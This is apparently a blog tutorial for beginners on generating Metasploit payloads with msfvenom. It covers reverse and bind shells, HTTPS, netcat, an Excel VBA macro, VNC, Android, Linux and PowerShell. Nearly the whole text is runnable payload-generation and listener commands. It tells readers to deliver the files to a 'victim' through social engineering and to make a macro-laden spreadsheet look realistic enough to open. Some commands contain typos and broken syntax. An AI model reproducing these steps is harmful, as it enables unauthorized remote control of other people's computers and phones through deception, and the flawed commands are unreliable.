Msfvenom Tutorials for Beginners

msfvenom

What is msfvenom ?

In simple word “msfvenom is a combination of msfpayload and msfencode. It is used to generate payloads and encode them as well.” Now you don’t have need to run two different commands to create payload and encode it. msfvenom comes by default in metasploit.

In the terminal type command msfvenom. It will show you all available options for creating a payload.

Abbreviations:

Lhost= (IP of your machine)

Lport= (any port you wish to assign to the listener)

P= (Payload I.e. Windows, Android, PHP etc.)

F= file extension (i.e. windows=exe, android=apk etc.)

Bind shell

A bind shell is a kind that opens up a new service on the target machine and requires the attacker to connect to it in order to get a session.

In yout terminal type:

msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/Desktop/bind.exe

It will save the “exe” payload file on your desktop as specified on the command /root/Desktop/bind.exe. We need to send this file to the victim machine through file share or by any social engineering technique and have it run on the system.

Now let us start msfconsole and type below command to get a session of the victim machine.

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/bind_tcp
msf exploit(handler) > set rhost xxx.xxx.xxx.xxx
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit

Once the file is executed on the machine we will get the victim machine meterpreter session.

The bind_tcp option is helpful in case we get disconnected from victim machine while it is still running, we can execute the same command and get back the session without any intervention of the victim to run the exploit again.

Reverse TCP Payload

A reverse shell (also known as a connect-back) is the exact opposite: it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.

Type command:

msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=5555 -f exe > / root/Desktop/reverse_tcp.exe

In this case, we will include few other options such as lhost (localhost) and lport (local port) to get a reverse connection from the victim machine.

Once the payload is generated and send to the victim for execution, we will start our next step as shown below.

Now let us start msfconsole and type below command to get a session of the victim machine.

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit

Once the payload is executed by the victim, we received a reverse connection and got the meterpreter session successfully.

HTTPS Payload

Note: Both the above payloads can be used in case we have relevant ports active on the victim machine, so the question arises what if the victim has blocked all the ports?

Well in such cases we can create payloads as per the ports running on victim machine such as 443 for https:

Let’s us use this case and create a payload with https.

Type command:

msfvenom -p windows/meterpreter/reverse_https lhost=xxx.xxx.xxx.xxx lport=443 -f exe > /root/Desktop/443.exe

Once the payload is generated and send to the victim for execution, we will start our next step as shown below.

Now let us start msfconsole and type this command to get a session of the victim machine.

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
msf exploit(handler) > set lport 443
msf exploit(handler) > exploit

Once the payload is executed by the victim, we received a reverse connection and got the meterpreter session.

Hidden Bind TCP Payload

Let us now explore some other technique available in msfvenom Tool and try to exploit the victim machine, this time we will get the shell of the victim machine instead of meterpreter session.

msfvenom -p windows/shell_hidden_bind_tcp ahost=xxx.xxx.xxx.xxx lport=1010 -f exe > /root/Desktop/hidden.exe

Once the payload is generated and send to the victim for execution, we will start our next step as shown below.

We use Netcat to set up our listener.

nc xxx.xxx.xxx.xxx 1010

Reverse Shell Payload with Netcat

Let us now do the same process and use shell_reverse_tcp payload, one more technique to get shell session of the victim.

msfvenom -p windows/shell_reverse_tcp ahost=xxx.xxx.xxx.xxx lport=1111-f exe > /root/Desktop/ncshell.exe

Once the payload is generated and send to the victim for execution, we will start our next step as shown below.

We set up our listener using netcat.

nc -lvp 1111

Macro Payload

Let us now create a payload with a VBA script, which we will use to create a macro on Excel to exploit victim machine.

Let us begin to create the payload!!

msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=7777 -f vba

once the command is executed copy the script starting from “#if VBA 7 till “End if”.

now open an excel file and press alt+F11 key to open VB script, you will get the options box, enter the name you will like to provide and click on “create”.

You will get a new options box, click on “This workbook” and replace the values with your copied vb script payload generated by the msfvenom tool and close the vb script editor and enable the macro.

Now you may draft your excel file with relevant data which may look realistic for a victim to open the file and send it to the victim.

To capture the sessions let us now start the multi handler as stated below:

msf > use exploit/multi/handler
msf exploit(handler) > set paylaod windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
msf exploit(handler) > set lport 7777
msf exploit(handler) > exploit

Once the excel file is opened by the victim, it will prompt the victim to enable the macro, once enabled, our VBScript will get executed to provide us with a reverse connection to the victim machine.

VNC Payload

Let us begin to create the payload!!

msfvenom -p windows/vncinject/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=5900 -f exe > /root/Desktop/vnc.exe

Once the payload is generated and send to the victim for execution, we will start our next step as shown below. To capture the sessions let us now start the multi handler as stated below:

msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set paylaod windows/vncinject/reverse_tcp
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
msf exploit(handler) > set lport= 5900
msf exploit(handler) > exploit

Android Payload

let us use one of the androids exploit available within the msfvenom tool and use it to our benefit.

Let’s begin

msfvenom -p andriod/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=8888 > /root/Desktop/file.apk

Once the payload gets generated send it to the victim to execute on his handheld and start multi handler.

msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
msf exploit(handler) > set lport 8888
msf exploit(handler) > exploit

Once the payload gets executed, you will get the meterpreter session.

Linux Payload

Open the Terminal and type the command as mention below:

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=4444 -f elf > /root/Desktop/shell

Once the payload gets generated send it to the victim to execute on his Linux machine and start multi handler.

msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
msf exploit(handler) > set lhost 4444
msf exploit(handler) > run

Powershell Payload

Open the Terminal and type the command as mention below:

msfvenom -p cmd/windows/reverse_powershell lhost=xxx.xxx.xxx.xxx lport=4444 > /root/Desktop/shell.bat

Once the payload gets generated send it to the victim to execute on his windows machine and start multi handler.

msf > use multi/handler
msf exploit(handler) > set payload cmd/windows/reverse_powershell
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

Once the payload gets executed, it will create a reverse connection to the shell.

Related Post

Leave a Reply

Your email address will not be published. Required fields are marked *